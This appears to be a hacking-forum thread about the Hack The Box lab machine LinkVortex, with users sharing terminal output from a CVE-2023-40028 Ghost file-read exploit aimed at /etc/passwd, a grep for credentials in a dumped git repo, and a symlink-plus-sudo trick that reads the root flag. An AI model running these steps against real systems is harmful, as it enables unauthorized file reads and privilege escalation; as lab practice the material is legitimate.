Posts: 5
Threads: 1
Joined: Apr 2024
(Dec 08, 2024, 01:23 PM)xxoro Wrote: (Dec 08, 2024, 08:06 AM)htbdesperate Wrote: Hi,
Can anyone explain to me why this happened? I changed the host to linkvortex.htb:
./CVE-2023-40028.sh -u admin@linkvortex.htb -p FOUNDPASSWORD
WELCOME TO THE CVE-2023-40028 SHELL
file> /etc/passwd
ln: failed to create symbolic link './exploit/content/images/2024/I6WM1TUiiJqbx.png': Operation not permitted
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Not Found</pre>
</body>
</html>
rm: cannot remove './exploit/content/images/2024/I6WM1TUiiJqbx.png': No such file or directory
file> ^C
how did u find the password, i am lost
Try some simple searches in the git repo you dumped.
ex.
grep -C 5 password $(find . -type f)
Change "password" for anything you want lets say admin, credentials, token, session and you will get somewhere
Posts: 18
Threads: 2
Joined: Nov 2024
(Dec 08, 2024, 02:03 PM)cashiwoo Wrote: (Dec 08, 2024, 01:23 PM)xxoro Wrote: (Dec 08, 2024, 08:06 AM)htbdesperate Wrote: Hi,
Can anyone explain to me why this happened? I changed the host to linkvortex.htb:
./CVE-2023-40028.sh -u admin@linkvortex.htb -p FOUNDPASSWORD
WELCOME TO THE CVE-2023-40028 SHELL
file> /etc/passwd
ln: failed to create symbolic link './exploit/content/images/2024/I6WM1TUiiJqbx.png': Operation not permitted
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Not Found</pre>
</body>
</html>
rm: cannot remove './exploit/content/images/2024/I6WM1TUiiJqbx.png': No such file or directory
file> ^C
how did u find the password, i am lost
Try some simple searches in the git repo you dumped.
ex.
grep -C 5 password $(find . -type f)
i am getting nothing when trying to /etc/passwd or any file getting same error ass you, is script even creating the png file that its supposed to create?
Posts: 12
Threads: 0
Joined: Oct 2024
(Dec 08, 2024, 02:03 PM)cashiwoo Wrote: (Dec 08, 2024, 01:23 PM)xxoro Wrote: (Dec 08, 2024, 08:06 AM)htbdesperate Wrote: Hi,
Can anyone explain to me why this happened? I changed the host to linkvortex.htb:
./CVE-2023-40028.sh -u admin@linkvortex.htb -p FOUNDPASSWORD
WELCOME TO THE CVE-2023-40028 SHELL
file> /etc/passwd
ln: failed to create symbolic link './exploit/content/images/2024/I6WM1TUiiJqbx.png': Operation not permitted
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Not Found</pre>
</body>
</html>
rm: cannot remove './exploit/content/images/2024/I6WM1TUiiJqbx.png': No such file or directory
file> ^C
how did u find the password, i am lost
Try some simple searches in the git repo you dumped.
ex.
grep -C 5 password $(find . -type f)
that is not working, unable to find the password
Posts: 14
Threads: 1
Joined: Sep 2024
(Dec 07, 2024, 09:06 PM)mhsoraa Wrote: (Dec 07, 2024, 08:39 PM)ritualist Wrote: Dockerfile.ghost has the path to the config file
Use https://github.com/0xyassine/CVE-2023-40028 to read it
For root you can either use chained symlinks to get the root flag / ssh key or just put your code for e.g. a suid bash in the CHECK_CONTENT variable.
Thank you...
bob@linkvortex:~$ ln -s /root/root.txt pwn.txt
bob@linkvortex:~$ ln -s /home/bob/pwn.txt pwn.png
bob@linkvortex:~$ sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/pwn.png
Link found [ /home/bob/pwn.png ] , moving it to quarantine
Content:
911be11ee404e95c2e1f273ed2039179
bob@linkvortex:~$
thank you for this saved me so much time with the time i already wasted trying to get this to work
Posts: 1
Threads: 0
Joined: Sep 2024
Thank you for all this guys!
Posts: 10
Threads: 1
Joined: Aug 2024
Thank you, i love your content, the best team
|
